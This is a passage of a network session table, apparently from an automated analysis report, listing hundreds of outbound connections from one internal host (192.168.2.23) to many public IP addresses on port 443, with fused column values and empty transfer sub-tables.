                                                21693192.168.2.2352000169.163.157.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21694192.168.2.235634213.23.198.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21695192.168.2.235814049.9.78.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21696192.168.2.2339954120.207.42.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21697192.168.2.233964658.195.18.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21698192.168.2.2339080101.171.212.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21699192.168.2.2336368109.214.200.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21700192.168.2.2352362128.125.41.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21701192.168.2.233680037.21.117.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21702192.168.2.233631450.107.78.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21703192.168.2.235086632.158.123.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21704192.168.2.2338144193.139.248.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21705192.168.2.233762258.244.50.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21706192.168.2.2345464114.138.62.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21707192.168.2.235010666.3.179.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21708192.168.2.2345964128.115.13.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21709192.168.2.235043093.163.69.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21710192.168.2.235763225.7.183.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21711192.168.2.2350708184.243.119.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21712192.168.2.235293648.55.147.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21713192.168.2.2354932190.156.139.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21714192.168.2.234896478.241.204.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21715192.168.2.235528834.232.199.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21716192.168.2.2339186142.148.83.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21717192.168.2.2342186217.198.85.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21718192.168.2.2341772148.177.20.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21719192.168.2.234499037.114.239.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21720192.168.2.2333394131.139.149.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21721192.168.2.2352788137.107.221.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21722192.168.2.2341174218.80.157.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21723192.168.2.233320867.84.235.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21724192.168.2.2334310107.78.52.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21725192.168.2.234227290.92.180.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21726192.168.2.23606642.209.95.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21727192.168.2.233657690.165.196.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21728192.168.2.233617673.251.17.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21729192.168.2.2351378110.181.255.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21730192.168.2.2334602157.242.8.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21731192.168.2.2360680106.176.108.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21732192.168.2.234005467.197.30.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21733192.168.2.233937868.206.209.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21734192.168.2.2360222190.78.68.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21735192.168.2.234138297.163.192.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21736192.168.2.2357626135.196.149.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21737192.168.2.2343296164.162.148.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21738192.168.2.2351334119.89.60.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21739192.168.2.234546854.140.119.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21740192.168.2.233591085.17.117.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21741192.168.2.2358644150.172.249.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21742192.168.2.234296837.113.230.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21743192.168.2.235791269.7.126.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21744192.168.2.2354750184.87.76.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21745192.168.2.2333794121.132.252.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21746192.168.2.2350718131.88.181.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21747192.168.2.2340762143.10.183.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21748192.168.2.2349334104.210.59.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21749192.168.2.235851039.200.249.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21750192.168.2.2349420206.209.182.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21751192.168.2.2337500197.20.222.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21752192.168.2.235049464.193.79.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21753192.168.2.2347630213.203.117.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21754192.168.2.2358218186.81.255.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21755192.168.2.2348126179.13.104.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21756192.168.2.234388852.135.9.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21757192.168.2.234076497.142.142.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21758192.168.2.2354750146.220.48.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21759192.168.2.2337060180.209.140.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21760192.168.2.234716263.89.103.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21761192.168.2.2360868113.72.77.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21762192.168.2.2350726177.200.64.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21763192.168.2.235262449.81.89.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21764192.168.2.236000849.70.247.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21765192.168.2.2358738174.150.201.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21766192.168.2.2338916156.209.22.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21767192.168.2.2356894134.170.218.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21768192.168.2.2347198220.15.9.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21769192.168.2.233470881.6.193.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21770192.168.2.235035250.134.203.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21771192.168.2.234100499.243.112.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21772192.168.2.2344080157.222.244.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21773192.168.2.234418667.194.176.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21774192.168.2.2335714221.194.201.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21775192.168.2.2349830113.199.102.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21776192.168.2.2356206166.159.108.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21777192.168.2.2356406137.102.213.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21778192.168.2.2354812154.40.251.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21779192.168.2.234509278.125.201.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21780192.168.2.235595614.235.216.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21781192.168.2.234296859.237.230.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21782192.168.2.235602018.170.217.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21783192.168.2.2359900152.88.104.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21784192.168.2.2353982169.162.157.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21785192.168.2.235235214.46.53.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21786192.168.2.233486881.78.77.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21787192.168.2.2360388148.223.42.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21788192.168.2.2347554170.160.9.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21789192.168.2.233617012.63.66.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21790192.168.2.236076496.180.54.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21791192.168.2.2351562125.139.234.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21792192.168.2.234756650.241.30.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21793192.168.2.2354506115.105.5.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21794192.168.2.2360698132.106.3.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21795192.168.2.2348110220.152.58.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21796192.168.2.233481477.121.103.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21797192.168.2.2346792140.172.119.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21798192.168.2.2359178148.130.50.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21799192.168.2.2337080119.55.215.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21800192.168.2.2352788167.249.79.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21801192.168.2.235876875.69.160.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21802192.168.2.2338938132.204.215.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21803192.168.2.2333610140.227.234.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21804192.168.2.235136852.61.150.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21805192.168.2.2341438182.19.2.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21806192.168.2.2353924168.107.173.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21807192.168.2.2339320192.53.253.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21808192.168.2.2358852189.112.245.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21809192.168.2.2344424124.205.120.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21810192.168.2.235603081.7.87.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21811192.168.2.2335220153.22.82.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21812192.168.2.234289259.199.254.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21813192.168.2.2359894130.49.114.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21814192.168.2.234968273.143.102.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21815192.168.2.2345226154.0.123.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21816192.168.2.233765018.26.138.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21817192.168.2.234485223.171.232.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21818192.168.2.23553545.152.103.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21819192.168.2.23379828.29.70.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21820192.168.2.2345522119.198.223.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21821192.168.2.2338150204.219.219.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21822192.168.2.235560461.163.215.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21823192.168.2.2335364210.206.60.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21824192.168.2.236064837.173.128.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21825192.168.2.23580482.67.230.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21826192.168.2.2337004108.163.98.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21827192.168.2.2351928188.208.121.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21828192.168.2.2357048149.211.182.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21829192.168.2.235009298.45.252.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21830192.168.2.235949697.143.220.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21831192.168.2.234773863.12.138.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21832192.168.2.2360410151.239.67.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21833192.168.2.233349848.84.57.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21834192.168.2.234432470.29.94.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21835192.168.2.2340596192.62.87.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21836192.168.2.2338142182.193.204.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21837192.168.2.2341108182.144.43.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21838192.168.2.2337766106.147.93.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21839192.168.2.2342356100.201.174.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21840192.168.2.2340042170.91.102.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21841192.168.2.235596663.247.68.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21842192.168.2.2353248161.206.56.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21843192.168.2.233890248.169.59.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21844192.168.2.2333660170.1.2.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21845192.168.2.2339154110.15.95.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21846192.168.2.235184252.7.130.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21847192.168.2.2333126181.175.40.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21848192.168.2.2347514198.154.166.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21849192.168.2.2359732178.224.180.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21850192.168.2.2350566156.3.32.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21851192.168.2.235302450.40.115.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21852192.168.2.2356824173.101.82.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21853192.168.2.2353128131.245.233.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21854192.168.2.2346674198.152.252.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21855192.168.2.234236070.53.41.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21856192.168.2.234436492.177.230.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21857192.168.2.235742837.169.130.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21858192.168.2.2354554200.167.97.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21859192.168.2.234441648.219.236.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21860192.168.2.2348774112.82.129.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21861192.168.2.235599462.213.69.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21862192.168.2.2340548218.36.247.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21863192.168.2.2340632112.227.145.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21864192.168.2.2352736219.106.182.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21865192.168.2.2349452108.124.192.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21866192.168.2.2351828101.48.83.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21867192.168.2.234216617.192.241.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21868192.168.2.233887093.104.64.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21869192.168.2.2346752200.0.4.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21870192.168.2.2337486155.180.98.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21871192.168.2.23431462.47.20.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21872192.168.2.2350708201.27.229.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21873192.168.2.2354446124.252.11.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21874192.168.2.233867096.141.121.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21875192.168.2.233510040.28.154.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21876192.168.2.233356860.254.95.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21877192.168.2.2334342186.213.215.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21878192.168.2.234417853.173.130.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21879192.168.2.2360298211.122.220.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21880192.168.2.233383897.227.189.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21881192.168.2.234472420.29.155.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21882192.168.2.2336208101.7.39.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21883192.168.2.233439231.221.247.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21884192.168.2.2357386137.122.100.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21885192.168.2.2342420184.59.127.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21886192.168.2.2341980220.67.97.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21887192.168.2.2333132188.211.114.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21888192.168.2.233434888.156.19.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21889192.168.2.233408281.116.53.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21890192.168.2.2349282114.121.164.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21891192.168.2.2357232151.68.31.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21892192.168.2.2337946153.86.21.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21893192.168.2.2350344177.3.158.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21894192.168.2.233738089.210.88.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21895192.168.2.2346618125.206.110.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21896192.168.2.234261831.83.242.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21897192.168.2.2333556222.111.181.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21898192.168.2.2335592117.147.112.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21899192.168.2.2357298140.114.245.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21900192.168.2.234109498.236.228.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21901192.168.2.2351428122.21.116.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21902192.168.2.2345236111.180.211.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21903192.168.2.235238044.5.25.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21904192.168.2.2354846149.39.231.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21905192.168.2.2344032113.196.253.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21906192.168.2.2333438116.179.151.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21907192.168.2.2333066108.207.9.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21908192.168.2.2341616106.113.78.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21909192.168.2.2348266132.39.82.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21910192.168.2.2336724165.145.129.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21911192.168.2.23411705.247.243.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21912192.168.2.2334472114.139.51.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21913192.168.2.2353544123.250.1.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21914192.168.2.2353886115.113.226.40443
                                                TimestampBytes transferredDirectionData


